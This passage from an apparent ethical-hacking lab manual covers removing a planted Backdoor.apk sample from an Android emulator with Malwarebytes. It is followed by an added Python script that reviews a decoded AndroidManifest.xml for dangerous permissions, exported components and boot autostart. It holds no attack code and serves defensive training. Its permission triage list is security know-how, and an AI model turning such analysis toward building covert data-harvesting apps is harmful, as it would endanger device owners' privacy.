18. The Report section displays information such as MD5, SHA1, SHA256, file size, filename, etc.
19.
Scroll down to view information regarding Requested Permissions, Responsible API calls for used Permissions, Potentially dangerous Calls, and more.
Note: You can also use other online Android analyzers such as SandDroid.

Figure 2.3.2: Launching Google Play

3. In the Search for apps & games field, type malwarebytes. From the results, click Malwarebytes Security, as shown in the screenshot.
4. The Malwarebytes Security: Virus Cleaner, Anti-Malware app information is displayed; click the Install button to start the installation of the app.
5. Once installation completes, click the Open button to launch it.
6. Malwarebytes Security initializes. A Let's get you started message appears; click the Get started button to proceed.
7. In the permissions window, click Give permission.
8. A system pop-up appears asking for permission; click ALLOW.
9. On the next screen, click the Start Premium trial button to start the free premium trial version of Malwarebytes Security.
10. The Your device is safe screen loads; click the Scan now button to start scanning the system.
11. Malwarebytes Security begins the security scan, as shown in the screenshot.
12. After the completion of the scan, a Scan finished message appears; click View scan results to see the results.
13. A Threats screen appears. This will show you all the malware (if any) found on your device.
Note: Here, the malware found is the malicious file Backdoor.apk.

Remove Malware

14. Click the Remove selected button to remove the detected malware from your device.
15. A confirmation pop-up appears; click OK to confirm the removal of the malware.
16. The Malwarebytes Scanner screen appears, notifying you that All items have been dealt with!
17. Click Scan after update in the lower section of the Scanner window under Previous scans to view details of the scan.
18. The Scanning history screen appears, displaying the deleted malicious file, as shown in the screenshot.
19. This concludes the demonstration of how to secure Android devices from malicious apps using Malwarebytes Security.
20. Close all open windows and document all the acquired information.
21. Turn off the Android emulator virtual machine.

Lab Analysis

Analyze and document all the results discovered in the lab exercise.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS ABOUT THIS LAB.

Platform Supported: Classroom, iLabs

Certified Ethical Hacker: EC-Council Official Curricula
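The Requested Permissions and AndroidManifest.xml sections reviewed in the online analyzer task can also be triaged offline once the manifest has been decoded from binary XML to text. The following is an added example, not part of the original lab manual or of either analyzer: it lists dangerous permissions, components reachable by other apps without a permission guard, and boot-time autostart. The sample manifest, its package and class names, and the function name are constructed.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"
COMPONENTS = ("activity", "service", "receiver", "provider")
# Subset of the permissions Android classifies as "dangerous" (runtime-granted).
DANGEROUS = {"android.permission." + p for p in (
    "READ_SMS", "SEND_SMS", "RECEIVE_SMS", "READ_CONTACTS", "READ_CALL_LOG",
    "CALL_PHONE", "RECORD_AUDIO", "CAMERA", "ACCESS_FINE_LOCATION",
    "ACCESS_COARSE_LOCATION", "READ_PHONE_STATE", "READ_EXTERNAL_STORAGE",
    "WRITE_EXTERNAL_STORAGE")}

# Constructed manifest in decoded (text) form; package and class names are made up.
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.sample">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application>
    <activity android:name=".MainActivity">
      <intent-filter><action android:name="android.intent.action.MAIN"/></intent-filter>
    </activity>
    <service android:name=".SyncService" android:exported="true"/>
    <receiver android:name=".BootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
    <provider android:name=".DataProvider" android:exported="false"/>
  </application>
</manifest>
"""


def review_manifest(xml_text):
    """Summarise the security-relevant declarations of a decoded manifest."""
    # The manifest comes from an untrusted APK: refuse DTDs and entity declarations.
    if "<!DOCTYPE" in xml_text or "<!ENTITY" in xml_text:
        raise ValueError("DTD or entity declaration in manifest")
    root = ET.fromstring(xml_text)
    requested = [e.get(ANDROID + "name", "") for e in root.iter("uses-permission")]
    exposed, boot_receivers = [], []
    app = root.find("application")
    for comp in (app if app is not None else []):
        if comp.tag not in COMPONENTS:
            continue
        name = comp.get(ANDROID + "name", "")
        actions = [a.get(ANDROID + "name", "") for a in comp.iter("action")]
        flag = comp.get(ANDROID + "exported")
        # With no explicit flag, an intent filter exports the component
        # (the default for apps targeting versions before Android 12).
        exported = flag == "true" or (flag is None and bool(actions))
        launcher = "android.intent.action.MAIN" in actions  # must be exported
        if exported and not launcher and comp.get(ANDROID + "permission") is None:
            exposed.append((comp.tag, name))
        if comp.tag == "receiver" and "android.intent.action.BOOT_COMPLETED" in actions:
            boot_receivers.append(name)
    return {
        "package": root.get("package", ""),
        "requested": requested,
        "dangerous": sorted(p for p in requested if p in DANGEROUS),
        "exposed_components": exposed,
        "starts_at_boot": bool(boot_receivers)
        and "android.permission.RECEIVE_BOOT_COMPLETED" in requested,
    }


if __name__ == "__main__":
    for key, value in review_manifest(SAMPLE_MANIFEST).items():
        print(f"{key}: {value}")
```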
